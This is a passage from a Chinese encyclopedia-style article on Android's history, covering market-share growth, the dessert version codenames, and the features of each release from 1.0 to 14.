（姜饼）。2011年1月，谷歌称每日的Android设备新用户数量达到了30万部，到2011年7月，这个数字增长到55万部，而Android系统设备的用户总数达到了1.35亿，Android系统已经成为智能手机领域占有量最高的系统。2011年8月2日，Android手机已占据全球智能机市场48%的份额，并在亚太地区市场占据统治地位，终结了Symbian（塞班系统）的霸主地位，跃居全球第一。2011年9月，Android系统的应用数目已经达到了48万，而在智能手机市场，Android系统的占有率已经达到了43%。继续在排在移动操作系统首位。谷歌将会发布全新的Android 4.0操作系统，这款系统被谷歌命名为Ice Cream Sandwich（冰激凌三明治）。2012年1月6日，谷歌Android Market已有10万开发者推出超过40万活跃的应用，大多数的应用程序为免费。Android Market应用程序商店目录在新年首周周末突破40万基准，距离突破30万应用仅4个月。在2011年早些时候，Android Market从20万增加到30万应用也花了四个月 [4]  。2013年11月1日，Android4.4正式发布，从具体功能上讲，Android4.4提供了各种实用小功能，新的Android系统更智能，添加更多的Emoji表情图案，UI的改进也更现代，如全新的HelloiOS7半透明效果。2014第一季度Android平台已占所有移动广告流量来源的42.8%，首度超越iOS。但运营收入不及iOS。2015年，网络安全公司Zimperium研究人员警告，安卓(Android)存在“致命”安全漏洞,黑客发送一封彩信便能在用户毫不知情的情况下完全控制手机。2018年10月，谷歌表示，将于2018年12月6日停止Android系统中的Nearby Notifications（附近通知）服务，因为Android用户收到太多的附近商家推销信息的垃圾邮件。2020年3月，谷歌的Android安全公告中提到，新更新已经提供了CVE-2020-0069补丁来解决针对联发科芯片的一个严重安全漏洞。2022年2月，Android 12L Beta 3 版本发布，首次支持了 Pixel 6 和 Pixel 6 Pro，以及更新的测试环境、缺陷修复和优化。2022年2月，谷歌宣布推出Android隐私沙盒，旨在引入更新、更具私密性的广告解决方案，以限制与第三方机构共享用户信息，但不损害广告主短期利益。谷歌计划在年内随测试版一起发布隐私沙盒开发者预览版。2022年3月27日消息，据俄罗斯卫星通讯社报道，由于受到美国制裁，谷歌已经停止认证运行Android系统的俄罗斯BQ公司的智能手机，该公司将转向使用中国华为公司打造的鸿蒙系统。 北京时间2022年5月6日下午消息，据报道，5月5日是世界密码日，苹果、谷歌和微软这三大科技巨头在一项联合计划中宣布，他们将致力于在未来一年，在其控制的所有移动、桌面和浏览器平台上打造无密码登录系统。 2022年，安卓推出类似灵动岛的App——dynamicSpot。 [27]  10月3日消息，安卓灵动岛App下载量破100万。发行版本：Android在正式发行之前，最开始拥有两个内部测试版本，并且以著名的机器人名称来对其进行命名，它们分别是：阿童木（AndroidBeta），发条机器人（Android 1.0）。后来由于涉及到版权问题，谷歌将其命名规则变更为用甜点作为它们系统版本的代号的命名方法。甜点命名法开始于Android 1.5发布的时候。作为每个版本代表的甜点的尺寸越变越大，然后按照26个字母数序：纸杯蛋糕（Android 1.5），甜甜圈（Android 1.6），松饼（Android 2.0/2.1），冻酸奶（Android 2.2），姜饼（Android 2.3），蜂巢（Android 3.0），冰激凌三明治（Android 4.0），果冻豆（Jelly Bean，Android4.1和Android 4.2），奇巧（KitKat，Android 4.4），棒棒糖（Lollipop，Android 5.0），棉花糖（Marshmallow，Android 6.0），牛轧糖（Nougat，Android 7.0），奥利奥（Oreo，Android 8.0），派（Pie,Android 9.0） [8-9]  从Android 10开始，Android不会再按照基于美味零食或甜点的字母顺序命名，而是转换为版本号，就像Windows操作系统和iOS系统一样 [10]  。V1.0 Beta2007年发布的Android 阿童木。V1.0主词条：Android 1.02008年9月，谷歌发布Android1.0 [3]  。V1.5主词条：Android 1.5Cupcake（纸杯蛋糕）：2009年4月30日发布。主要的更新如下：拍摄/播放影片，并支持上传到Youtube；支持立体声蓝牙耳机，同时改善自动配对性能；最新的采用WebKit技术的浏览器，支持复制/贴上和页面中搜索；GPS性能大大提高；提供屏幕虚拟键盘；主屏幕增加音乐播放器和相框widgets；应用程序自动随着手机旋转；短信、Gmail、日历，浏览器的用户接口大幅改进，如Gmail可以批量删除邮件；相机启动速度加快，拍摄图片可以直接上传到Picasa；来电照片显示。V1.6主词条：Android 1.6Donut（甜甜圈）：2009年9月15日发布。主要的更新如下：重新设计的Android Market手势；支持CDMA网络；文字转语音系统（Text-to-Speech）；快速搜索框；全新的拍照接口；查看应用程序耗电；支持虚拟私人网络（VPN）；支持更多的屏幕分辨率；支持OpenCore2媒体引擎；新增面向视觉或听觉困难人群的易用性插件。V2.1主词条：Android 2.12009年10月26日发布。主要更新：优化硬件速度；"Car Home"程序；支持更多的屏幕分辨率；改良的用户界面；新的浏览器的用户接口和支持HTML5；新的联系人名单；更好的白色/黑色背景比率；改进Google Maps3.1.2；支持Microsoft Exchange；支持内置相机闪光灯；支持数码变焦；改进的虚拟键盘；支持蓝牙2.1；支持动态桌面的设计。V2.2主词条：Android 2.2Froyo（冻酸奶）：2010年5月20日发布。主要更新：整体性能大幅度的提升；3G网络共享功能；Flash的支持；App2sd功能；全新的软件商店；更多的Web应用API接口的开发。V2.3主词条：android 2.3Gingerbread（姜饼） ：2010年12月7日发布。主要更新：增加了新的垃圾回收和优化处理事件；原生代码可直接存取输入和感应器事件、EGL/OpenGLES、OpenSL ES；新的管理窗口和生命周期的框架；支持VP8和WebM视频格式，提供AAC和AMR宽频编码，提供了新的音频效果器；支持前置摄像头、SIP/VOIP和NFC（近场通讯）；简化界面、速度提升；更快更直观的文字输入；一键文字选择和复制/粘帖；改进的电源管理系统；新的应用管理方式。V3.0主词条：Android 3.0Honeycomb（蜂巢）：2011年2月3日发布。主要更新：针对平板大屏幕而做优化；全新设计的UI增强网页浏览功能 ；in-app purchases功能。V3.1主词条：Android 3.1Honeycomb（蜂巢） ：2011年5月11日布发布。主要更新：经过优化的Gmail电子邮箱 ；全面支持Google Maps ；将Android手机系统跟平板系统再次合并从而方便开发者；任务管理器可滚动，支持USB输入设备（键盘、鼠标等） ；支持Google TV.可以支持XBOX 360无线手柄；widget支持的变化，能更加容易的定制屏幕widget插件。V3.2主词条：android 3.2Honeycomb（蜂巢）：2011年7月13日发布。主要更新：支持SD卡；支持7英寸平板和高通处理器；桌面小部件自由缩放。V4.0主词条：Android 4.0Ice Cream Sandwich（冰激凌三明治）：2011年10月19日上午十点，谷歌与三星联手在中国香港举办发布会，公布有关Android 4.0系统信息。版本主要更新如下：全新的UI；全新的Chrome Lite浏览器，有离线阅读，16标签页，隐身浏览模式等；截图功能；更强大的图片编辑功能；自带照片应用堪比Instagram，可以加滤镜、加相框，进行360度全景拍摄，照片还能根据地点来排序；Gmail加入手势、离线搜索功能，UI更强大；新功能People：以联系人照片为核心，界面偏重滑动而非点击，集成了Twitter、Linkedin、Google+等通讯工具。有望支持用户自定义添加第三方服务；新增流量管理工具，可具体查看每个应用产生的流量，限制使用流量，到达设置标准后自动断开网络。V4.1主词条：Android 4.1Android 4.1Jelly Bean（果冻豆）：2012年6月28日发布。新特性：更快、更流畅、更灵敏；特效动画的帧速提高至60fps，增加了三倍缓冲；增强通知栏；全新搜索；搜索将会带来全新的UI、智能语音搜索和Google Now三项新功能；桌面插件自动调整大小；加强无障碍操作；语言和输入法扩展；新的输入类型和功能；新的连接类型。V4.2Android 4.2 Jelly Bean 原生系统用户界面主词条：Android 4.2Android 4.2Jelly Bean（果冻豆）：2012年10月30日发布。Android 4.2沿用“果冻豆”这一名称，以反映这种最新操作系统与Android 4.1的相似性，但Android 4.2推出了一些重大的新特性，具体如下：Photo Sphere全景拍照功能；键盘手势输入功能；改进锁屏功能，包括锁屏状态下支持桌面挂件和直接打开照相功能等；可扩展通知，允许用户直接打开应用；Gmail邮件可缩放显示；Daydream屏幕保护程序；用户连点三次可放大整个显示屏，还可用两根手指进行旋转和缩放显示，以及专为盲人用户设计的语音输出和手势模式导航功能等；支持Miracast无线显示共享功能；Google Now现可允许用户使用Gamail作为新的数据来源，如改进后的航班追踪功能、酒店和餐厅预订功能以及音乐和电影推荐功能等。V4.3主词条：Android 4.32013年7月25日发布。V4.4主词条：Android 4.4Android 4.4KitKat（奇巧巧克力）: 2013年下半年发布。2013年9月4日凌晨，谷歌对外公布了Android新版本Android 4.4KitKat（奇巧巧克力），并且于2013年11月01日正式发布，新的4.4系统更加整合了自家服务，力求防止安卓系统继续碎片化、分散化 [11]  。V5.0主词条：Android 5.0Android 5.0Lollipop（棒棒糖）：2014年6月26日发布。Android 5.0 系统使用一种新的Material Design设计风格。从图片上就能看到一些全新的设计。从图片上看，这套设计图对 Android 系统的桌面图标及部件的透明度进行的稍稍的调整，并且各种桌面小部件也可以重叠摆放。虽然调整桌面部件透明度对 Android 系统来说并不算什么新鲜的功能，但是加入了透明度的改进。界面加入了五彩缤纷的颜色、流畅的动画效果，呈现出一种清新的风格。采用这种设计的目的在于统一 Android 设备的外观和使用体验，不论是手机、平板还是多媒体播放器。V5.1主词条：Android 5.1Android 5.1新系统相对于Android5.0更加稳定了，同时支持多张SIM卡，加强了设备保护机制，增强了设备的WiFi能力。V6.0Android 6.0Marshmallow（棉花糖）：2015年9月30日新系统的整体设计风格依然保持扁平化的Material Design风格。Android6.0在对软件体验与运行性能上进行了大幅度的优化。据测试，Android6.0可使设备续航时间提升30%。V7.0Android 7.0Nougat（牛轧糖）：2016年8月22日 [9] Android 7.0 提供新功能以提升性能、生产效率和安全性。通过新的系统行为测试您的应用，以节省电量和内存。充分利用多窗口 UI、直接回复通知等功能。V7.1Android 7.1更新为用户和开发人员引入了各种新功能。快捷方式您可以使用新的快捷方式功能将用户从启动器直接带入应用程序内的关键操作。用户只需长按应用程序的启动器图标以显示应用程序的快捷方式，然后点击快捷方式即可跳至相关的操作。这些快捷方式是吸引用户的好方法，它们使您甚至在用户启动应用程序之前也可以展示应用程序的功能。每个快捷方式都引用一个意图，每个意图都会启动一个特定的动作或任务，并且您可以为可以表示为意图的任何动作创建一个快捷方式。例如，您可以创建用于发送新短信，进行预订，播放视频，继续游戏，加载地图位置等等的意图。您可以通过将应用程序快捷方式添加到APK中的资源文件中来为其静态创建快捷方式，也可以在运行时动态添加它们。静态快捷方式是常见操作的理想选择，动态快捷方式使您可以根据用户的偏好，行为，位置等突出显示操作。每个应用程序中最多可以提供五个快捷键。但是请注意，某些启动器应用程序不会显示您为应用程序注册的所有快捷方式。您的应用添加快捷方式后，便可以在任何支持它们的启动器上使用它们，例如Pixel启动器（Pixel设备上的默认启动器），Now启动器（Nexus设备上的默认启动器）以及其他提供支持的启动器。屏幕截图任何应用程序都可以创建快捷方式，任何启动器应用程序都可以添加对快捷方式的支持。Android 7.1提供了一个API，供应用程序注册快捷方式和启动程序读取已注册的快捷方式。7.1 屏幕截图V8.0Android 8.0 奥利奥Android 8.0Oreo（奥利奥）：2017年8月22日发布。更智能、更快速、功能更强大。您喜爱的新 Android 版本以全球人都爱的一款曲奇饼为代号。新功能：画中画 通知圆点 通知渠道 自动填充框架 自动调整 TextView 的大小 可下载字体 自适应图标 快捷方式固定 广色域色彩 WebView 功能 Java 8 语言 API 媒体功能 多显示器支持 Neural Networks API Android Oreo（Go 版本）V8.1Android 8.1 功能和 APIAndroid 8.1（API 级别 27）为用户和开发者引入了各种新功能。Android 8.1 Go是一项旨在为全球数十亿网络用户优化 Android 体验的计划。从 Android 8.1 开始，我们就在将 Android 打造成入门级设备的理想平台。Android Oreo（Go 版本）配置中的功能包括：内存优化。改进了整个平台的内存使用情况，可确保应用可以在内存不超过 1GB 的设备上高效运行。灵活的定位选项。新的硬件功能常量，可让您通过 Google Play 向正常内存或低内存设备分发应用。Google Play。尽管所有应用都可以在搭载 Android Oreo（Go 版本）的设备上使用，但 Google Play 仍会按照“为数十亿用户打造产品”指南展示经过开发者专门优化的应用，以便为数十亿用户提供出色的体验。我们更新了“为数十亿用户打造产品”指南，加入了有关如何针对搭载 Android Oreo（Go 版本）的设备优化应用的指导。对于大多数开发者来说，优化现有的 APK，或使用 Google Play 的多 APK 功能将某个 APK 版本定位到低内存设备，是针对搭载 Android Oreo（Go 版本）的设备做好准备的最佳方式。请注意，无论您的受众使用何种设备，将应用打造得更加纤巧高效都对他们有益。V9.0Android 9.0 PieAndroid 9.0Pie （派）：2018年5月9日发布。通知栏样式更改，整体设计添加了更多圆形。Android 9 利用人工智能技术，让手机可以为您提供更多帮助。现在，手机变得更智能、更快，并且还可以随着您的使用进行调整。V10.0Android 10从 Android 10 开始，Google 开始提供系统级的黑暗模式，大部分预装应用、抽屉、设置菜单和 Google Feed 资讯流等界面和按钮，都会变成以黑色为主色调，就和你在 macOS Mojave 中看到的暗色界面一样。为确保用户隐私和安全支持新的保护措施。借助高性能编解码器、更出色的生物识别技术、更快的应用启动速度、Vulkan 1.1、NNAPI 1.2、可折叠设备和 5G 等更多功能扩展！谷歌宣布Android系统的重大改变，不仅换了全新的logo，命名方式也变了，2019年的Android Q的正式名称是Android 10 [12]  。V11.0Android 11 LOGO2019年10月11日消息，据外媒报道，2019年Android开发峰会将于本月晚些时候开幕，谷歌公布了完整的会议日程。在会议日程中谷歌官方首次提到了Android 11。此前外媒发现在AOSP中，谷歌已经启用了代号“Android R”。按照Android命名规则，Android R应该就是下一代Android：Android 11。由于疫情原因，谷歌宣布取消线下的开发者大会，后来又取消了线上开发者大会，所以Android 11 将在2020年第三季度发布官网发布时间轴Android 11 开发者预览版计划从 2020 年 2 月启动，到向 AOSP 和 OEM 提供最终的公开版本时结束，最终版本预计将于 2020 年第 3 季度发布。在开发阶段的各个关键里程碑，我们将为您的开发和测试环境提供更新。每次更新均包括 SDK 工具、系统映像、模拟器、API 参考和 API 差异。里程碑列表如下。时间轴Build类型开发者操作2 月开发者预览版 1早期的基准 build，涉及新功能、API 和行为变更，重点关注开发者反馈。API 反馈的重要窗口。查看新的 API 和行为变更，并在此期间向我们报告任何重大问题或请求。3 月开发者预览版 2增量更新，涉及更多的功能、API 和行为变更。在处理 API 和行为变更时，向我们提供反馈。开始早期的应用兼容性测试。4 月开发者预览版 3针对稳定性和性能的增量更新。准备好应用，迎接消费者 Beta 版。继续进行兼容性测试，在不更改目标的情况下发布更新。如有任何问题，通知 SDK 和库的开发者。5 月Beta 版 1初始 Beta 版本，面向注册试用 Android Beta 版的尝鲜者提供无线更新。继续进行兼容性测试，留意 Android Beta 版用户的反馈。开始针对 Android 11 的早期测试。6 月Beta 版 2平台稳定性里程碑，提供最终的 API 和行为。开放 Play 发布。开始对应用、SDK 和库进行最终的兼容性测试。发布兼容版本。继续针对 Android 11 的工作。第 3 季度Beta 版 3候选版本 build。发布应用、SDK 和库的兼容更新。继续针对 Android 11 的工作。使用新功能和 API 构建应用。第 3 季度最终版本面向 AOSP 和生态系统发布 Android 11 版本。发布应用、SDK 和库的兼容更新。继续针对 Android 11 的工作。使用新功能和 API 构建应用。V12.02021年5月19日凌晨消息，谷歌宣布Android 12正式到来，测试版现在即可供下载 [15]  。V13.02022年2月11日，谷歌发布了首个 Android 13 开发者预览版，将在6月发布稳定版。 [17] 2022年5月12日，谷歌举办I/O 2022开发者大会，并正式发布Android 13。 [23] 2022年8月16日，谷歌今日面向 Pixel 设备推送了 Android 13 正式版更新，并将源代码上传到了 Android 开源项目（AOSP）。 [25] V14.02022年9月，谷歌平台与生态系统高级副总裁Hiroshi Lockheimer在社交平台上宣布了一则新消息：Android 14将支持卫星通讯技术。 [26]